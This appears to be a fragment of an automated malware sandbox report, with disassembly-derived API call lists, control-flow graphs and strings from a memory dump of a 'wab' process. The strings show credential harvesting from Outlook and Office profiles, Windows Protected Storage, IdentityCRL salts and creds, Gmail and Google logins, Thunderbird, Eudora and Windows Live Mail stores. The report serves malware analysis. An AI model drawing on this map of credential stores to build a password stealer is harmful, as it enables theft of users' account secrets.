4275cd 44 API calls 34207 424852 108 API calls 34209 42dbd4 18 API calls 34054 40c5d8 18 API calls 34210 432bda 16 API calls 34211 43ebd9 22 API calls 33883 4105dd FindResourceA 33884 4105f6 SizeofResource 33883->33884 33887 410620 33883->33887 33885 410607 LoadResource 33884->33885 33884->33887 33886 410615 LockResource 33885->33886 33885->33887 33886->33887 34214 4013de 15 API calls 34217 424852 76 API calls 34058 4141e7 15 API calls 34219 43ebdd 25 API calls 34220 43efec 18 API calls 34222 443ff5 _onexit 34060 4021f6 14 API calls 34224 427bfb 36 API calls 34062 433982 16 API calls 34064 411182 InterlockedCompareExchange RtlDeleteCriticalSection 34227 412786 _endthreadex 34065 401591 8 API calls 34230 432b91 15 API calls 34231 43eb91 17 API calls 34068 410597 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34232 43ff95 20 API calls 34233 42af9d 31 API calls 34234 424852 119 API calls 34236 4143a4 18 API calls 34239 409fae 12 API calls 34073 419db5 42 API calls 34240 4167b5 memset 34241 4293b4 10 API calls 34074 40f5b8 70 API calls 34076 4375b9 22 API calls 34246 4243bd 15 API calls

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
APIs
• memset.MSVCRT ref: 004080A5
• memset.MSVCRT ref: 004080B9
• memset.MSVCRT ref: 004080D3
• memset.MSVCRT ref: 004080E8
• GetComputerNameA.KERNEL32(?,?), ref: 0040810A
• GetUserNameA.ADVAPI32(?,?), ref: 0040811E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
• strlen.MSVCRT ref: 0040815B
• strlen.MSVCRT ref: 0040816A
• memcpy.MSVCRT ref: 0040817C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
• Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
• Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
• Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 437 407cce-407cd3 433->437 435 407cd5-407d03 strlen * 2 434->435 436 407cc9 call 407d1f 434->436 440 407d12 435->440 441 407d05-407d10 call 406e81 435->441 436->437 437->435 439 407d18-407d1e 437->439 443 407d15-407d17 440->443 441->443 443->439
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
• FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
• strlen.MSVCRT ref: 00407CEB
• strlen.MSVCRT ref: 00407CF3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: .8D
• API String ID: 379999529-2881260426
• Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
• Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
• Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
• Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 00401E82
• strlen.MSVCRT ref: 00401E9B
• strlen.MSVCRT ref: 00401EA9
• strlen.MSVCRT ref: 00401EEF
• strlen.MSVCRT ref: 00401EFD
• memset.MSVCRT ref: 00401FA8
• atoi.MSVCRT ref: 00401FD7
• memset.MSVCRT ref: 00401FFA
• sprintf.MSVCRT ref: 00402027
  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
• memset.MSVCRT ref: 0040207D
• memset.MSVCRT ref: 00402092
• strlen.MSVCRT ref: 00402098
• strlen.MSVCRT ref: 004020A6
• strlen.MSVCRT ref: 004020D9
• strlen.MSVCRT ref: 004020E7
• memset.MSVCRT ref: 0040200F
  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
• _mbscpy.MSVCRT ref: 0040216E
• RegCloseKey.ADVAPI32(00000000), ref: 00402178
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
Strings
Memory Dump Source
• Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 1846531875-4223776976
• Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
• Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
• Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
• Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
  • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
  • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
  • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
• ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
• DeleteObject.GDI32(?), ref: 0040CEC8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
                                                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                                                    • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                    • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                                                    • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                    • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                                                      • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                      • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                      • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                    • API String ID: 2768085393-888555734
                                                                                                                                                                                                                    • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                    • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3662548030-0
                                                                                                                                                                                                                    • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                    • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                                                      • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                                                      • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                                                      • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                                                      • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                      • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                      • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443866
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443881
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Store Root, xrefs: 00443892
                                                                                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                    • API String ID: 832325562-2578778931
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 329 40efdf-40efea call 404780 318->329 330 40ef8f-40efb3 call 4047a0 318->330 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 328 40f036-40f044 322->328 328->315 329->320 330->329 335 40efb5-40efb8 330->335 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->329 337->336
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                                                      • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                                                      • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                                                      • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                      • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                                                                                    • API String ID: 317221925-3288273942
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                      • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                      • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                      • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                      • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
